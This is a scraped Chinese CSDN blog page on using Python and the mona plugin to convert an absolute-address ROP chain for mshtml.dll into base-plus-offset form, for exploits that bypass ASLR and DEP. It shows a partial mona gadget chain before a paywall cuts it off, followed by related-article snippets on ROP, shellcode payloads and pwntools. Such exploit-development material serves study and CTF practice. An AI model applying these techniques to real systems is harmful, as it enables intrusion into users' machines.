python实现生成相对地址的ROP

最新推荐文章于 2024-04-17 18:18:54 发布
最新推荐文章于 2024-04-17 18:18:54 发布
阅读量1.7k 收藏
点赞数
文章标签: ROP mona python 相对地址
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35519254/article/details/53234599
版权
这篇博客介绍了如何利用Python脚本结合mona模块创建相对地址的Return-Oriented Programming(ROP)链,以应对ASLR和DEP绕过。通过修改模块基地址,生成的JavaScript代码能在不同环境中动态生成ROP链。
摘要由CSDN通过智能技术生成
在溢出的时候,为了绕过需要一个ROP链,此时可以使用mona模块生成一个ROP链,命令为!py mona rop -m mshtml.dll ,此时生成的ROP是一个决定地址的,这样生成的ROP不能在其他电脑上使用,或者电脑重启之后也不能使用了,我们常见的溢出利用思路是利用内存泄漏绕过ASLR,然后利用ROP绕过DEP,此时就需要生成一个相对的ROP(即包含模块基地址+偏移)


我自己写了段python代码,实现这一功能:
首先将mona生成的ROP部分保存为jueduidizhi.txt,代码如下: 
def create_rop_chain():

        # rop chain generated with mona.py - www.corelan.be
        rop_gadgets = ""
        rop_gadgets += struct.pack('<L',0x68edd743)    # POP EBP # RETN [mshtml.dll] 
        rop_gadgets += struct.pack('<L',0x68edd743)    # skip 4 bytes [mshtml.dll]
        rop_gadgets += struct.pack('<L',0x692a240a)    # POP EBX # RETN [mshtml.dll] 
        rop_gadgets += struct.pack('<L',0x00000201)    # 0x00000201-> ebx
        rop_gadgets += struct.pack('<L',0x6916b796)    # POP EDX # RETN [mshtml.dll] 
        rop_gadgets += struct.pack('<L',0x00000040)    # 0x00000040-> edx
        rop_gadgets += struct.pack('<L&#
最低0.47元/天 解锁文章
qq_35519254
关注
小型企业办公耗材库存管理软件的设计与实现
AI天才研究院
04-21 773
1. 背景介绍 1.1 办公耗材管理的重要性 在现代办公环境中,办公耗材是确保日常运营顺利进行的关键因素。无论是打印机耗材、文具用品还是其他办公用品,它们都是办公活动不可或缺的一部分。然而,由于种类繁多、使用频率高,办公耗材的管理往往容易被忽视,导致库存混乱、浪费资源等问题。 因此
python avg函数在哪个模块_python数据处理工具–Pandas模块
weixin_36179103的博客
03-01 1256
健壮的数据处理模块Pandas,能够处理数据的预处理作业,如数据类型的转化、缺失值的处理、描绘性核算分析和数据的汇总等一、序列与数据框的结构Pandas模块的中心操作政策为序列和数据框。序列指数据会集的一个字段,数据框为至少含有两apple个字段(或序列)的数据集。1.结构序列经过列表、元祖、Numpy中的一维数组结构序列均如序列1,榜首列为序列的行索引(行号),主动从0开始;第二列为序列的实践值...
python中的相对路径
weixin_42752435的博客
07-24 3525
利用相对路径打开文件 如果是如上图结构,若要在study.py中打开aaa.txt和bbb.txt,可以这样写: open('aaa.txt') open('data/bbb.txt') open('./data/bbb.txt') ###错误 open('/data/bbb.txt') 获取当前路径的方法 利用os模块 import os print os.getcwd() ...
python文件路径--相对路径
wxyllyw的博客
07-24 2370
在使用相对路径之前需要检查程序的工作路径 查看程序的工作路径 import os print(os.getcwd()) 将工作路径修改为当前程序所在路径 os.chdir('D:\\python\\python入门到实践\\10文件和异常\\文件路径') print(os.getcwd()) 注意路径是双斜线 相对路径 同级目录 -----------直接调用文件名 with open...
python相对路径和绝对路径
interface_comm的博客
03-09 238
python相对路径和绝对路径 随笔
python的绝对路径和相对路径
python伊甸园的博客
09-04 3万+
一、绝对路径
Python基础知识三】绝对/相对路径及文件导入/导出
WW、forever的博客
04-23 8043
总结遇到的Python相关问题:绝对/相对路径及文件导入/导出
Python代码保护 | pyc 混淆从入门到工具实现
weixin_42636275的博客
06-12 2115
之前接触到 Python 逆向相关的一些 CTF 题目(最近一次是某符的 game),有的给出 Python 的伪指令,还有的直接给了一个被替换过指令的 pyc 文件,于是学习了一下Python 的字节码。学习过程中发现替换字节码指令这个操作其实是 Python 源码保护的一种方式,于是想到有没有不去修改 Python 解释器的方法去保护源码(增加对抗的成本)。 查阅资料发现 Python 源码有几种保护的方式: 1.生成 pyc 文件:这感觉完全不能算保护,uncompyle6 一键反编译,支持 Pyth
一、pwn - 零基础ROP之Android ARM 32位篇(新修订,精华篇)
最新发布
键盘的起始页
04-17 1039
一旦你知道了溢出的偏移量,你就可以构造一个包含NOP滑梯、shellcode以及用于覆盖PC的正确地址的有效载荷。你需要确保shellcode位于溢出点之后,并且PC被设置为指向NOP滑梯的开始部分,这样当执行流到达该位置时就会滑入你的shellcode并执行。使用模式创建工具来确定哪部分输入覆盖了程序计数器(PC),是一种常见的方法,特别是在开发缓冲区溢出漏洞利用时。当程序崩溃时,检查程序计数器(PC)的值。工具将输出一个数字,表示在模式中的偏移量,这个数字就是从输入数据的开始到覆盖PC的点的字节数。
python读取相对路径 绝对路径
喵酱
09-23 1万+
1.简介 2.绝对路径 3.相对路径 一、简介 下面的路径介绍针对windows,在编写的py文件中打开文件的时候经常见到下面其中路径的表达方式。 我们常用’/‘来表示相对路径,’\‘来表示绝对路径,网页网址和linux、unix系统下一般都用’/‘ open('aaa.txt') open('/data/bbb.txt') open('D:\\user\\ccc.txt')...
Python 相对路径和绝对路径实例演示
weixin_44038289的博客
12-04 196
假设python.py的路径地址为: “E:/work/project/python.py”假设python1.py的路径地址为: “E:/work/project/python1.py”假设python2.py的路径地址为: “E:/work/project/python2.py”假设python3.py的路径地址为: “E:/work/project/python3.py”假设python4.py的路径地址为: “E:/work/project/data/python4.py”那么python.py的绝
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3250
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
【网络安全】Rop绕过DEP和ASRL流程实例介绍
Walter的专栏
09-16 8319
本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。 1、工具软件 ImmunityDebugger1.85 mona 插件 python 2.7.1 vulnserver win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154 kali1.0虚拟机执行攻击脚本,ip
ROPgadget - Gadgets finder and auto-roper
核桃树
01-21 4597
Description This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, PowerPC, SPARC and MIPS architectu
ROPgadget 工具
weixin_30414635的博客
03-14 5755
Install $ pip install ropgadget $ ROPgadget Usage usage: ROPgadget.py [-h] [-v] [-c] [--binary <binary>] [--opcode <opcodes>] [--string <string>] [--memstr ...
相对地址和绝对地址
AInteber的博客
08-04 3362
今天在编写前端跳转代码的时候遇到了一个相对地址和绝对地址的问题,拿来分享一下: 什么是相对地址 相对地址就是相对于当前网页的地址,你的所有跳转都是基于当前网址的,例如: document.location.href 就是相对地址跳转,这个方法实现的是在当前路径的基础上进行跳转 什么是绝对地址 绝对地址可以分为两种:一种是网络地址,一种是本地地址。 网络地址顾名思义就是直接跳转到网络的地...
使用ROP攻击技术
热门推荐
海枫的专栏
09-28 3万+
随着64系统广泛应用,原来通过栈控制函数参数的方法已不再适用了,攻击提出ROP攻击,又展开了一场新的较量。
[pwn]ROP:信息泄露获取libc版本和地址
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值